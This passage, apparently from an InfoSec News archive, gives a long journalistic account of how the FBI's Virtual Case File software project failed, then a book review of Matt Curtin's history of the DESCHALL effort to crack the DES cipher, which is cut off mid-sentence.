Depew's group defined how agents worked, how they gathered information, and how that information was fed into ACS. Working with engineers from SAIC, they drew up diagrams and flowcharts of how the case management system operated then and how they wanted the new case management system, the VCF, to operate in the future. Mueller himself attended one of these meetings to tell the agents to design a system that would work best for them and not to feel constrained by 50-year-old business rules. Depew's team also called in people from across the FBI: a dozen in the first few weeks; 40 by the end of November. These "subject matter experts" explained how their divisions or units functioned internally and with the rest of the bureau. In December 2001, the FBI asked SAIC to stop building a Web front end for the old programs. (Later, FBI computer specialists would create a Web interface as a stopgap, which is still used by agents today, until the VCF was delivered.) Instead, SAIC was asked to devise a new application, database, and graphical user interface to completely replace ACS. To formally define what users needed the VCF to do for them, SAIC embarked on a series of Joint Application Development (JAD) sessions. In these meetings, Depew's team of agents and experts got together with a group of SAIC engineers to hash out what functions the VCF would perform. Ideas captured in these sessions formed the basis of the requirements document that guided SAIC's application designers and programmers. In January 2002, the FBI requested an additional $70 million to accelerate Trilogy; Congress went further, approving $78 million. DynCorp committed to delivering its two components by July 2002. SAIC agreed to deliver the initial version of the VCF in December 2003 instead of June 2004. SAIC and the FBI were now committed to creating an entirely new case management system in 22 months, which would replace ACS in one fell swoop, using a risky maneuver known in the IT business as a flash cutover. Basically, people would log off from ACS on Friday afternoon and log on to the new system on Monday morning. Once the cutover happened, there was no going back, even if it turned out that the VCF didn't work. And there was no plan B. But while the Trilogy contracts were changed to reflect the aggressive new deadlines, neither the original software contract nor the modified one specified any formal criteria for the FBI to use to accept or reject the finished VCF software, as the Inspector General reported earlier this year. Furthermore, those contracts specified no formal project schedules at all, let alone milestones that SAIC and DynCorp were contractually obligated to meet on the way to final delivery. In reaction to the new deadline, SAIC broke its VCF development group into eight teams, working in parallel on different functional pieces of the program, in order to finish the job faster. But the eight threads would later prove too difficult for SAIC to combine into a single system. Nevertheless, in an interview at SAIC's McLean, Va., office complex, Rick Reynolds, vice president and operations manager for SAIC, defended the decision to change tactics. "People forget the urgency that we were under and our customer was under. And we were right beside them," he declared. "We were in the foxhole together." AT HOOVER BUILDING HEADQUARTERS, Depew's team was hard at work describing the FBI's investigative and administrative processes: how agents built case files, how case files were used, and what additional functions they wanted the Virtual Case File to perform. While Depew and his team prepared to communicate the processes that define the FBI to SAIC engineers, Mueller, Dies, and Chiaradio recruited a seasoned IT program manager. Before coming to the FBI, C.Z. ("Sherry") Higgins, a 29-year veteran of AT&T and Lucent, was running the help desk at the Technology Command and Control Center for the 2002 Winter Olympics in Salt Lake City. As project management executive for the Office of the Director, Higgins was brought in to create the Office of Program Management. Higgins's new office would centralize IT management and oversee, develop, and deploy the bureau's most expensive, complex, and risky projects. But her most important assignment was to manage Trilogy. Higgins, who left the FBI in June 2004, lives in a Cape Cod?style house overlooking a pond deep in the exurbs of Atlanta, in her native Georgia. During an interview in her living room, three fat scrapbooks of her two and a half years at the FBI peeked out from beneath a coffee table covered with candles. Her first move when she came on board in March 2002, she explained, was to appoint Depew, who had no IT project management experience, the VCF project manager. "I'm totally accountable for that," she acknowledged. "We talked a long time about could he play the role of project manager and still be customer advocate. And we felt like he could." Higgins and Depew had developed a rapport quickly. Just a couple of weeks after she started work at FBI headquarters, Depew invited her to the Thursday "board meeting" - pizza and beer with his team at a neighborhood joint. As the group started walking to the restaurant, Higgins, surrounded by agents in dark suits and sunglasses, asked them to stop so she could savor the moment. "I have arrived," she announced. "I'm on Pennsylvania Avenue with men in black!" The men in black had been specifying the VCF's requirements with SAIC engineers for several weeks when Higgins shifted Depew into the driver's seat. By this point, Depew, the former Trenton, N.J.?based bureau man, had rented an apartment in Washington, where he would live, separated from his family, for the next three years. He was responsible for a team of seven agents, each of whom acted as an advocate for a group of subject matter experts in the periodic JAD meetings with SAIC engineers that the team was attending. Over a six-month period, the JAD team met in two-week sessions, laying the unstable foundation for the VCF. Every day of each session, engineers from SAIC would sit with the agents and experts to chart existing and future processes on whiteboards. According to Higgins, sometimes agents would propose Web-page designs for particular portions of the user interface. So that the crowded meetings would stay orderly, people were assigned speaker and observer cards. Depew acted as a facilitator, running the meetings and telling people whether something they wanted was or was not within the scope of the project. "There were times when SAIC and I disagreed on what's in the scope," Depew recalled. Sometimes they would agree to "push that off to other people to decide whether that's in the scope of the current contract." After a two-week JAD session finished, a two-week feedback cycle would begin. SAIC provided Depew's team with information gleaned from the session, including needs statements, flow charts, and meeting minutes. Depew's team reviewed these materials and gave SAIC feedback while simultaneously preparing subject matter experts for the next round of JAD sessions, which immediately followed the feedback cycle. There were no breaks. "I worked seven days a week, 14 hours a day," Depew recalled. "Six months of JAD was hell." MEANWHILE, HIGGINS was finding it rough going herself. She asked her colleagues at the FBI and managers at DynCorp, which was working on the hardware (computers and network) portions of Trilogy, for copies of the two project schedules. She was told the delivery dates instead. In contrast, SAIC, with its programmers pecking away at its secure data center in Vienna, Va., always had a detailed schedule posted prominently in the "war room" there, which Higgins's team would review with SAIC periodically, she said. In mid-April 2002, Higgins gave DynCorp a week to deliver a detailed schedule. After she got it, she pulled the project teams from the FBI and DynCorp into a meeting and went through the document. Shortly after that, Higgins broke the news to the director: the computers and networks would not be delivered in July of that year as had been scheduled. She told Mueller that DynCorp didn't stand a chance of hitting the delivery target, because it didn't have a detailed schedule that mapped out how it would deploy, integrate, and test the new computers and networks. Mueller blamed himself for the delay, because he'd asked for an accelerated schedule. But Higgins blamed Mueller's staff for not being straight with him about his agency's ability to deliver what he wanted. "Did somebody come to you and say, okay, Mr. Director, sir, you can have it sooner, but it's going to cost you this much more money or you're going to have to do without something?" Higgins remembered asking Mueller. "And he said, 'No, nobody ever told me that.' And I said, 'Well, lesson No. 1: faster, cheaper, better. Pick two, but you can't have all three.'" With costs escalating and schedules slipping, Mueller had just one choice left: better. And he didn't even get that with the VCF. But in the summer of 2002, it certainly seemed as if the Virtual Case File would be a vast improvement over the Automated Case Support system. The JAD sessions had produced an exhaustively detailed requirements document. This plan for a case-management system would combine the ACS with two other systems: the Telephone Application, the bureau's central repository of telephone records related to investigations, and parts of the Criminal Law Enforcement Application, a repository for investigative data about people, organizations, locations, vehicles, and communications. The VCF system would accept scanned documents, photographs, and other electronic media - to simplify evidence tracking. People with the proper credentials would be able to access that evidence from any FBI office. The way work flowed through the bureau would change dramatically, too. Instead of filling out a form either by hand or in a word-processing program and then faxing or FedEx-ing the paper form to a supervisor, an agent would fill out a form online and, with a click of the mouse, route it to the supervisor. The document would pop up in a supervisor's in-box, and the agent could track it to see if it had been approved. And perhaps most important, information collected within a case file would eventually be available to software applications that would compare data among cases to search for correlations - to connect the proverbial dots. In a Senate hearing in July 2002, Higgins impressed lawmakers, including Senator Charles E. Schumer (D-N.Y.) - "That Southern charm gets me every time," an apparently smitten Schumer gushed - with a PowerPoint presentation about the VCF. Higgins contrasted the 12 different screens agents had to navigate to upload one form into ACS with the single screen they would use to perform a similar task in the new system. Higgins told the senators that the initial version of a user-friendly, secure system would be delivered by December 2003. The senators seemed satisfied that the VCF would address their gravest concerns about the FBI's IT systems by giving agents and intelligence analysts the ability to correlate and share the data needed to prevent future terrorist attacks. Higgins had reassured the senators?and scored some choice memorabilia: a Senate coaster and her nameplate for her scrapbook. IN THE SUMMER OF 2002, turmoil roiled the FBI's IT management. In May, Bob Dies, the CIO who had launched Trilogy, left the bureau, turning over his duties to Mark Tanner, who held the position of acting CIO for just three months, until July 2002. He stepped aside for Darwin John, former CIO for the Mormon Church. Chiaradio, who declined to be interviewed for this article, left for a lucrative job in the private sector with BearingPoint Inc., a global consultancy in McLean, Va., and was replaced by W. Wilson Lowery Jr. Within a year, Lowery would replace John. At the same time, SAIC was staffing up. By August 2002, it had around 200 programmers on the job. It was still looking for help, particularly for its security team, which was reviewing design documents that described the VCF software's overall structure, algorithms, and user interface, along with the ways data would be defined and handled. Matthew Patton answered an ad on SAIC's Web site for security engineers. A 1995 Carnegie Mellon University graduate with a B.S. in information and decision systems, Patton had financed college through service as a cadet in the U.S. Air Force Reserve Officers' Training Corps. After college, he spent his four-year tour of military duty at the Pentagon in the Office of the Secretary of Defense. There he designed and helped program the database and security components for a Web-based application used to plan the Department of Defense's $400 billion budget. Patton's still-valid top-secret DOD clearance qualified him to start work as part of the VCF security team. His clearance was provisional - the FBI would have to conduct its own background investigation (as it does for all contract employees) and grant him FBI top-secret clearance. So he was not allowed to see the data the FBI was sending to SAIC, which included information on all of the cases the bureau had digitized to that point, from the 1995 Oklahoma City bombing to 9/11. Instead, he spent a lot of time going through the requirements in his cubicle, segregated from his five colleagues and his boss. He left SAIC in November 2002, after only three months on the job. Patton regards himself as a straight shooter. "I'm not much of a culture guy," he admits. "I say my piece, and if they don't like it, that's too damn bad." But he quickly realized that SAIC didn't hire him for his opinions. When he began expressing concerns that security was not a top priority on the project, even in the post-Hanssen era, he was told not to rock the boat. "My refrain to my boss was, 'Why aren't we more involved? We should be in the thick of things.' But it was more that we weren't really invited and [SAIC teams working on the VCF] aren't actively seeking our involvement," Patton said in an interview in Chicago earlier this year. "So his take on it was basically, once the designers come up with something, we say good, bad, or indifferent, and if it's not too bad, then we let it go." Patton recounted his experience purely from memory. Unlike Higgins, who meticulously inserted internal FBI e-mails about Trilogy into her scrapbooks alongside photos of her kids visiting her in D.C., Patton said that he discarded the notebook he kept while he was at SAIC. The only existing artifact of his experience is a copy of the 26 October 2002 Internet posting that essentially got him kicked off the VCF project. The posting, archived at http://archives.neohapsis.com/archives/isn/2002-q4/0090.html, expressed specific security-related concerns and depicts SAIC as giving a clueless FBI exactly what it was asking for, no matter how impractical. Patton's descriptions of the 800-plus pages of requirements show the project careening off the rails right from the beginning. For starters, this bloated document violated the first rule of software planning: keep it simple. According to experts, a requirements document should describe at a high level what functions the program should perform. The developers then decide how those functions should be implemented. Requirements documents tend to consist of direct, general phrases: "The user shall be able to search the database by keyword," for instance. "In a requirements document, you want to dictate the whats, not the hows," Patton said. "We need an e-mail system that can do x, and there's 12 bullets. Instead, we had things like 'there will be a page with a button that says e-mail on it.' We want our button here on the page or we want it that color. We want a logo on the front page that looks like x. We want certain things on the left-hand side of the page." He shook his head. "They were trying to design the system layout and then the whole application logic before they had actually even figured out what they wanted the system to do." Recalling the Web pages the agents would bring into the JAD sessions to demonstrate how they wanted the VCF to look, Higgins blamed both SAIC and the agents for creating the overstuffed requirements document. "The customer should be saying, 'This is what we need.' And the contractor should be saying, 'Here's how we're going to deliver it.' And those lines were never clear," Higgins said. "The culture within the FBI was, 'We're going to tell you how to do it.'" Zalmai Azmi, the FBI's current CIO, has been in that job since December 2003. Originally brought on as a consultant to Mueller that November, Azmi had worked with the director when Mueller was U.S. Attorney in San Francisco and Azmi was CIO of the Executive Office for United States Attorneys. Azmi saw the Virtual Case File through its final death throes. In an hour-long interview in his office at the Hoover Building, Azmi also traced the VCF's demise to flawed requirements and emphasized that his office is taking pains to make sure it doesn't happen again. Azmi insisted that SAIC should have clarified user needs in the JAD sessions rather than working with requirements that were not "clear, precise, and complete." On the other hand, the FBI's lax project management didn't stop the requirements from snowballing. "There was no discipline to say enough is enough," Azmi said. The overly specific nature of the requirements focused developers on their tiny piece of the puzzle. They were writing code, Patton said, with no idea of how their piece fit with the others. This presaged the integration problems that would later plague the project. "The whole working procedure [SAIC project managers] had was very much, 'We'll give you your marching orders and you go,' without too much consideration of how in the world do you glue this sucker back together when all these different divergent pieces come back," Patton said. Patton also claimed that SAIC was determined to write much of the VCF from scratch. This included an e-mail-like system that at least one team, to his knowledge, was writing, even though the FBI was already using an off-the-shelf software package, Novell's GroupWise, for e-mail. "Every time you write a line of code, you introduce bugs," noted Patton. "And they had a bunch of people slinging code. I'm not saying that the guys were technically incompetent. But bugs happen, and not all programmers are great." After several weeks of asking his boss questions and being repeatedly told that he needed to calm down and be "a team player," Patton posted a message to InfoSec News, an e-mail forum which distributes information security news articles and comments from its subscribers. Without naming the VCF specifically, he mentioned that he was working on Trilogy's case management system and complained that no one was taking security issues seriously. He pointed to some security measures the FBI already had in place that might make the case management system more secure. These included PKI, or public-key infrastructure, a system of digital certificates and independent authorities that verify and authenticate the validity of each party involved in an Internet transaction. He also mentioned Bedford, Mass.?based RSA Security Inc.'s SecurID, which uses a combination of passwords and physical authenticators that function like ATM cards to protect various kinds of electronic transactions. He asked for help in getting in touch "with some heavy-hitting clued-in people over at the FBI," who would "demand some real accountability from the contractors involved. "They [the FBI] don't know enough to even comment on a bad idea, let alone tear it apart," he went on. "As a two-bit journeyman I can't seem to get anyone to pay the slightest attention, nor do they apparently (want to) understand just how flawed the whole design is from the get-go." He ended by asking, "Shouldn't somebody care?" Somebody did. Sherry Higgins saw the message and promptly reported Patton to the FBI's Security Division. "He had posted information that was not true and was sensitive," she told me in an e-mail. "He was pretty much a disgruntled employee. Instead of bringing his concerns up the ladder, he chose to post them on the Internet. He blasted the team both at SAIC and the FBI." "Be careful of him," she warned. "In hindsite [sic], I guess it looks like he is saying now, 'I told you so.' However, at the time, he was disruptive instead of constructive." In response to Higgins's concerns, FBI agents questioned Patton about whether he had disclosed national security information and breached his top-secret DOD clearance. "There was nothing in there that was sensitive material," Patton maintained. "It was just not flattering of the FBI and the project itself." After the interview, the FBI decided not to grant Patton top-secret clearance, making it impossible for him to continue working on the VCF. SAIC did invite him to find another position within the company, but it didn't have anything for him in Chicago, to which he was relocating for personal reasons. So at the end of November 2002, Patton left SAIC and the VCF. That same month the FBI and SAIC agreed to a basic set of requirements, the baseline that SAIC would start from to build the VCF. IN DECEMBER 2002, Higgins asked lawmakers to invest an additional $137.9 million in Trilogy and the inspector general issued a report on the FBI's management of information technology that included a case study of the program. It found that "the lack of critical IT investment management processes for Trilogy contributed to missed milestones and led to uncertainties about cost, schedule, and technical goals." Apparently unperturbed by the findings, Congress approved another $123.2 million for a project whose total cost had now ballooned to $581 million. Meanwhile, SAIC programmers were cranking out code. The company had settled on a spiral development methodology, an iterative approach to writing software. Basically, SAIC programmers would write and compile a block of code that performed a particular function, then run it to show Depew's agents what it would do. The agents - some of whom were working at SAIC's data center in Vienna, Va. - gave the programmers feedback, and the programmers tried to incorporate the suggested changes. If there was some dispute as to whether the change could or should be made, the agents sent an official request to the change control board, composed of SAIC engineers and FBI personnel, for review. It wasn't long before the change requests started rolling in - roughly 400 from December 2002 to December 2003, according to SAIC. "Once they saw the product of the code we wrote, then they would say, 'Oh, we've got to change this. That isn't what I meant,'" said SAIC's Reynolds. "And that's when we started logging change request after change request after change request." Reynolds added that SAIC's bid on the original contract, and each subsequently revised cost estimate, was based on there being "minimal, minor changes" to the program once a baseline set of requirements had been agreed on. Instead, SAIC engineers were like a construction crew working from a set of constantly changing blueprints. Some of the changes were cosmetic - move a button from one part of the screen to another, for instance. Others required the programmers to add a new function to a part of the program, such as the graphical user interface, common to all eight development threads. For example, according to SAIC engineers, after the eight teams had completed about 25 percent of the VCF, the FBI wanted a "page crumb" capability added to all the screens. Also known as "bread crumbs," a name inspired by the Hansel and Gretel fairy tale, this navigation device gives users a list of URLs identifying the path taken through the VCF to arrive at the current screen. This new capability not only added more complexity, the SAIC engineers said, but delayed development because completed threads had to be retrofitted with the new feature. Once SAIC engineers agreed on how the page crumbs would work, one of the development teams created a set of page-crumb-equipped screens for the other seven teams to use as a model. The design model and supporting documentation were updated, the teams made the change - and the schedule slipped again. When asked how SAIC programmers reacted to agents' change requests, Depew replied, "Let's just say that we gave them feedback on what they were developing, where it met the requirements and where it didn't. And there was a lot of inconsistency between their development teams." Higgins was aware that tensions were mounting inside the VCF project over the course of the winter and spring of 2003. Sometimes Depew's team had only two days to review a batch of code. Agents would pull all-nighters to get the evaluation finished, "and in the next iteration their comments wouldn't be taken into account," she said. Sometimes, she acknowledged, these evaluations would include changes to the requirements - functions that the agents had decided that they needed once they saw what they were going to get. Other times the FBI team would find bugs that needed to be fixed. In March 2003, Computer Sciences Corp., in El Segundo, Calif., which had acquired DynCorp that month, told Higgins that the final deployment of the computers and networks would be delayed until October. In August, October became December. And in October, December became April 2004. The problem wasn't the PCs, which had been trickling in since 2001, but changing the e-mail system from Novell's GroupWise to Microsoft Outlook and, according to the inspector general's 2005 audit, obtaining the components needed to connect the field offices to the wide area network. Higgins added that the delays were compounded by the FBI's own sloppy inventories of existing networks and its underestimation of how taxing the network traffic would be once all 22 000 users came online using their new PCs. While the FBI and SAIC waited for the networks to go live so they could test the VCF on a real system, changes and fixes continued to strangle the VCF in the crib. Many of the changes had to be to made by all eight of SAIC's development teams. Arnold Punaro, SAIC executive vice president and general manager, admitted in a posting on the company's Web site that in the rush to get the program finished by December, SAIC didn't ensure that all of its programmers were making the changes the same way. That inconsistency occasionally meant that different modules of the VCF handled data in different ways. Consequently, when one module needed to communicate with another, errors sometimes occurred. "This, however, did not compromise the system," according to Punaro. The real killers, he said, were "significant management turbulence" at the FBI, "the ever-shifting nature of the requirements," and the agents' "trial-and-error, 'We will know it when we see it' approach to development." Through the summer of 2003, frustration between the agents and the engineers mounted. To quell tensions and discuss design flaws the agents believed were creeping into the VCF, Depew's team asked for a sit-down, what one agent called the "emperor has no clothes" meeting. One Sunday in late September, the agents and the engineers gathered to hash out their differences. Higgins listened in by phone to the first part of the day-long meeting. "There was an awful lot of anger on both sides and a lot of finger-pointing," she recalled. "Nobody's hands were clean." Depew, on the other hand, characterized the meeting as a frank exchange of views. "There was never any animosity shown by my team to the SAIC team," Depew said. Also in September, the U.S. General Accounting Office (renamed the Government Accountability Office on 7 July 2004) released a report titled "FBI Needs an Enterprise Architecture to Guide Its Modernization Activities." The GAO warned that without a blueprint that provides, in essence, the mother of all requirements documents, the bureau was exposing its modernization efforts, including the VCF, to unnecessary risk. "I suspect what happened with the VCF is that in the rush to put in place a system, you think you got your requirements nailed, but you really don't," said GAO's Randolph C. Hite, who worked on the report. "It was a classic case of not getting the requirements sufficiently defined in terms of completeness and correctness from the beginning. And so it required a continuous redefinition of requirements that had a cascading effect on what had already been designed and produced." While stressing that there are no guarantees, Hite believes that "had there been an architecture, the likelihood of these requirements problems would have been vastly diminished." But the abundantly funded VCF juggernaut was already hurtling toward delivery. SAIC began testing the program in the fall of 2003, and according to Higgins, problems started cropping up, some of which the agents had warned SAIC about over the previous summer. SAIC officials complained to Higgins that Computer Sciences Corp. didn't have its hardware and network in place, so SAIC couldn't adequately test the VCF, crucial for a successful flash cutover. They informed her that they would deliver a version of the VCF to be in technical compliance with the terms of the contract and that the FBI should feel free to make changes to it afterward. "The feeling was, they knew that they weren't going to make it in December of '03," but they were not forthright about the fact, Higgins said. ON 13 DECEMBER 2003, SAIC delivered the VCF to the FBI, only to have it declared DOA. Under Azmi's direction, the FBI rejected SAIC's delivery of the VCF. The bureau found 17 "functional deficiencies" it wanted SAIC to fix before the system was deployed. As an April 2005 report from a U.S. House of Representatives committee pointed out, there were big deficiencies and small ones. One of the big ones was not providing the ability to search for individuals by specialty and job title. Among the small ones was a button on the graphical user interface that was labeled "State" that should have read "State/Province/Territory." SAIC argued that at least some of these deficiencies were changes in requirements. An arbitrator was called in. The arbitrator's findings, released on 12 March 2004, found fault with both SAIC and the FBI. Of the 59 issues and subissues derived from the original 17 deficiencies, the arbitrator found that 19 were requirements changes - the FBI's fault; the other 40 were SAIC's errors. While SAIC fixed bugs, Azmi, with the help of Depew's team, created investigation scenarios that would take different cases from opening to closing and tested them on the VCF. Those tests revealed an additional 400 deficiencies. "We have requirements that are not in the final product, yet we have capabilities in the final product that we don't have requirements for," Azmi said in an interview. On 24 March, days after the arbitrator's findings were released, Director Mueller testified to the Senate Committee on Appropriation's Subcommittee on Commerce, Justice, State, and the Judiciary that the VCF would be "on board" - and presumably operational - by the summer of 2004. The director had scant reason to be so optimistic. True, Computer Sciences Corp. was then delivering the final pieces of equipment to the FBI. By April, 22 251 computer workstations, 3408 printers, 1463 scanners, 475 servers, and new local and wide area networks would all be up and running, 22 months later than the accelerated schedule called for. But Azmi and SAIC had yet to agree on the VCF's ultimate fate, much less when it would be deployed. And when SAIC finally offered to take one more year to make all the changes the FBI wanted at the cost of an additional $56 million, Azmi rejected the proposal. Azmi was promoted from interim to permanent CIO on 6 May 2004. Four days later, the Computer Science and Telecommunications Board of the National Research Council delivered a report on Trilogy that the FBI had commissioned. The "graybeards," as Mueller dubbed them, were led by James C. McGroddy, who had headed IBM Research from 1989 to 1995. The report made two major recommendations. The flash cutover that would start up the VCF and shut down ACS all at once must not happen, as a potential failure would be catastrophic for the bureau. And the FBI should create an enterprise architecture to guide the development of its IT systems. The same committee had made both of these recommendations in September 2002, and according to McGroddy, both suggestions had been ignored until Azmi took charge. Azmi invited the graybeards to talk with him, Mueller, Higgins, and a few other FBI officials on 20 May 2004. Azmi told the gathering that he had already contracted BearingPoint, where Robert Chiaradio was a managing director and lead advisor on homeland security, to construct the current and future versions of the enterprise architecture by September 2005. And he abandoned the flash cutover idea. In June, the FBI contracted an independent reviewer, Aerospace Corp., in El Segundo, Calif., to review the December 2003 delivery of the VCF to determine, among other things, whether the system requirements were correct and complete and to recommend what the FBI should do with the VCF. At the same time, Azmi asked SAIC to take the electronic workflow portion of the VCF, code that was in relatively good shape, and turn that into what was eventually called the Initial Operating Capability (IOC), at an additional fixed price to the FBI of $16.4 million. SAIC and the FBI project team had six months to deliver a software package that would be deployed to between 250 and 500 field personnel in the New Orleans field office, the Baton Rouge, La., resident agency, and a drug enforcement unit at the Hoover Building. The objectives for the new project were clear: test-drive the VCF's electronic workflow; see how people reacted to the graphical user interface; create a way to translate the output from the VCF forms, which was in the eXtensible Markup Language, into the ACS system; check out network performance; and develop a training program. The IOC was the perfect guinea pig for Azmi's rigorous approach to software development and project management, which he called the Life Cycle Management Directive. The project also needed different managers. On SAIC's side, Rick Reynolds assumed executive oversight on the project from Brice Zimmerman. Reynolds replaced VCF project manager Pat Boyle with Charlie Kanewske. (SAIC declined repeated requests to interview them.) Depew, like other FBI officials, had only good things to say about Kanewske. He had been Kanewske's project manager counterpart for a portion of the Investigative Data Warehouse project, the newest, shiniest tool at the disposal of FBI agents and intelligence analysts. Successfully deployed in January 2004, the warehouse translates and stores data from several FBI databases, including parts of ACS, into a common form and structure for analysis. But Depew would not be Kanewske's counterpart for the IOC project. He moved back to New Jersey, where he became director of the FBI's New Jersey Regional Computer Forensic Laboratory. When interviewed this past spring, he was overseeing the lab's daily operations and construction of a new wing. He was also anticipating retirement after 31 years of public service and thinking of pursuing job opportunities in the private sector. His final take on the VCF was to the point: "We wanted it really bad, and at the end it was really bad." As for Sherry Higgins, she went back home to Georgia before the IOC project launched. She now consults and teaches project management courses for the International Institute for Learning Inc., in New York City. "When it's not fun anymore, Sherry's not a happy girl," Higgins said of her mood just prior to her departure. "The writing was on the wall that IOC was going to be Zal's project. And I just felt like it would be better for me and for Zal for me to leave." Azmi handpicked his IOC project manager. He chose the bureau's gadget guru (think of "Q" from the James Bond movies) - a man with 20 years of experience delivering surveillance technologies on tight schedules. At a meeting this past May at the Hoover Building, the IOC project manager, whom the bureau made available on condition of anonymity, let me read through an internal FBI report on the IOC and explained the development process in detail. He stressed that the IOC was never meant to be deployed to all 28 000 FBI employees but was intended to test Azmi's methodology. "We followed all of this [process], even in this aggressive timeline, to prove he's got a good framework for managing these projects," he said. With new management in place, about 120 SAIC engineers began work on the IOC project in June 2004. The FBI and SAIC agreed to keep to a strict development schedule, define acceptance criteria, and institute a series of control gates?milestones SAIC would have to meet before the project could continue. Azmi, unlike the previous three CIOs, inserted himself into the day-to-day operations of the IOC project. All through the second half of 2004, he met with his project manager every morning at 8:15. Every night before 10 p.m., the project manager would issue a status report indicating what milestones had been hit, identifying risks, and suggesting actions to be taken to avoid mistakes and delays. Azmi's project manager worked closely with Kanewske to adhere to the baseline requirements SAIC and the FBI had agreed on for the IOC in July, thus avoiding a death spiral of change requests. In January, the IOC was rolled out as a pilot right on schedule, and just before the inspector general's stinging critique of the VCF was released. The report on the VCF from Aerospace Corp., the $2 million study of the December 2003 delivery commissioned by the FBI, began circulating on Capitol Hill at the same time. [Spectrum's attempt to obtain a copy of the report under the Freedom of Information Act was still being litigated at press time.] But during a hearing this past 3 February, Senator Judd Gregg (R-N.H.) disclosed that the report said that "the [VCF] architecture was developed without adequate assessment of alternatives and conformance to various architectural standards, and in a way that precluded the incorporation of significant commercial off-the-shelf software." Furthermore, "high-level documents, including the concept of operations, systems architecture, and system requirements were neither complete nor consistent, and did not map to user needs." Finally, "the requirements and design documentation were incomplete, imprecise, requirements and design tracings have gaps, and the software cannot be maintained without difficulty. And it is therefore unfit for use." The IOC pilot, meanwhile, ended in March. The verdict: "Although the IOC application was an aid to task management, its use did not improve the productivity of most users," according to an internal FBI assessment. When asked why the IOC did not improve productivity, the FBI project manager emphasized, "The goal was not to achieve improved productivity. What we learned through this is that when they deploy the work flow, there's a need to roll out an electronic records management capability simultaneously." In other words, FBI employees, particularly agents, found that the IOC actually increased their workload. Why? Agents filled out forms electronically and routed them to superiors for approval, after which the electronic form was uploaded to the ACS, still in use, to be shared with the rest of the FBI. But to comply with the FBI's paper-based records management system, the form had to be printed out, routed, signed, and filed. So what did the FBI get out of the VCF's last gasp? "We harvested some of the good work from the past," the FBI project manager told me. "We focused that into a pilot. We tested that life-cycle development model of Zal's, and that is a valid, repeatable process. And now we're in a good position to move on." FBI officials say they are taking what they learned from the VCF and charging ahead with new IT projects on two major fronts. Last September, the White House's Office of Management and Budget tapped the bureau to spearhead the development of a framework for a Federal Investigative Case Management System, an effort involving the National Institutes of Health and the departments of Justice and Homeland Security. The goal here is to provide a guide for any agency in the federal government to use when creating a case-management system. Then, late last May, Mueller announced Sentinel, a four-phase, four-year project intended to do the VCF's job and provide the bureau with a Web-based case- and records-management system that incorporates commercial off-the-shelf software. Sentinel's estimated cost remains a secret. The bureau expects to award the contract for phase one by the end of this year for delivery by December 2006. SAIC is one of only a handful of preapproved government contractors eligible to bid on the project. The FBI's Azmi seems confident that the bureau is ready to handle a project as complex as Sentinel. He said that the FBI has been planning the program for a year, evaluating commercial off-the-shelf software, creating an enterprise architecture, and establishing a number of IT management oversight boards. The bureau has also provided project management training to 80 IT staff members over the last year. Even so, Ken Orr, an IT systems architect and one of Mueller's graybeards, remains skeptical. He rated Sentinel's chances of success as very low. "The sheer fact that they made that kind of announcement about Sentinel shows that they really haven't learned anything," Orr said, from his office in Topeka, Kan. "To say that you're going to go out and buy something and have it installed within a year, based on their track record," isn't credible. "They need to sit down and really plan this out, because if they had working software today, they'd have only 25 percent of the problem solved," Orr estimated. The major questions the FBI needs to answer, he contended, include how to bring these new software programs online incrementally and train more than 30,000 people to use them. Then they could focus on converting millions of paper records as well as all of the audio, video, photographic, and physical evidence that has piled up over the years, which will continue to grow at an increasing rate to support the bureau's counterterrorism mission. "I would guess that it would be closer to 2010 or 2011 before they have the complete system up and running," Orr said. "That's assuming that you have a match between the software and the underlying requirements, which we know are subject to change." From isn at c4i.org Sat Sep 10 00:27:51 2005 From: isn at c4i.org (InfoSec News) Date: Sat Sep 10 00:37:41 2005 Subject: [ISN] Book Review: Brute Force - Cracking the Data Encryption Standard Message-ID: http://books.slashdot.org/books/05/09/08/1653245.shtml [ http://www.amazon.com/exec/obidos/ASIN/0387201092/c4iorg - WK] Author: Matt Curtin Pages: 291 Publisher: Copernicus Books Rating: 9 Reviewer: Isaac Jones ISBN: 0387201092 Summary: Volunteers working collaboratively over the internet manage to crack the Data Encryption Standard. Although I wasn't involved with the DES cracking challenge, I am friends with the author of this book. I took a Lisp course from Matt at Ohio State University and I'll be forever grateful that Matt introduced me to functional programming with a great deal of humor and enthusiasm. I don't think I've ever seen Matt stay so serious for so long, but his enthusiasm comes through clearly in this book. Brute Force can be enjoyed by both nerds and non-nerds interested in cryptography or codes. Those who have been a part of this or subsequent DES challenges may be particularly interested in this book. Curtin covers some technical details of DES and the brute force attack that the DESCHALL team used to discover a DES key. He also discusses the political and historical significance of this event. This is a fairly technical book, but it goes out of its way to explain non-obvious technical topics, so one doesn't need a lot of technical background to understand it. Curtin briefly explains a lot of stuff: the C programming language, firewalls, UDP, one-time pads, protected memory, etc., in order to make this book readable for novices. Although I generally did not need such explanations, I did not find them annoying or distracting, as they were fairly brief. In fact, it's fun to read concise explanations of such topics. Occasionally, Curtin does go into just a little too much detail. The chapter on Architecture gives an explanation of some of the many pieces of software that were involved in this effort. This chapter sometimes gets a bit bogged down with explanations of useful scripts that folks wrote to analyze data or forward packets through firewalls. Brute Force is a very readable and enjoyable book. It is well organized as a narrative, though it is not chronological; Curtin presents the background and substance to each aspect of the story together, rather than chronologically. This can be slightly confusing sometimes, but I think it improves the over-all flow of the story. In a way, Curtin gives away the ending to the book at the beginning (and in the title), but this isn't ancient history, and most readers will probably already know that DES was defeated by this effort. He still manages to maintain a good sense of suspense throughout the book. He presents tables and analysis of the effort, along with predictions about completion dates that volunteers had made at the time. Unfortunately, he doesn't tell us whether those tables turned out to be correct. What percentage of the keyspace was searched by Macintoshes? How many different kinds of client machines were there in the end? Did Ohio State University try more keys than Oregon State University? Which one is the real OSU? One of the main themes running throughout the book was that of community. The DESCHALL project was made up of thousands of volunteers from all over the US. Anyone with some spare CPU cycles could get involved by downloading the client software. This may remind you of other distributed computing projects like SETI@home. The community was further broken down into sub-groups like schools who would compete for bragging rights. The organization of the DESCHALL project was much like an open source project, though the key-cracking tools were not open source. Spreading the Word is a chapter about how people started to hear about DESCHALL and what the earliest adopters were like. Some of the tables in a later chapter list the operating system and hardware that the clients were running, which was a pretty cool snapshot of the Internet from 1997. It included lots of OS/2 clients, labs full of SGI machines, and plenty of computers which were only connected to the Internet via dial-up modems. Special scripts were developed for such machines so they could phone home when they needed a new block of keys. Though the key cracking clients were not open source, they were free as in beer, at least for Americans. Since such cryptography-related software could not be exported at the time, this was a US-only effort. There was a European team, however, with their own software, called SolNet, and Curtin keeps us updated on their progress. In fact the DESCHALL project 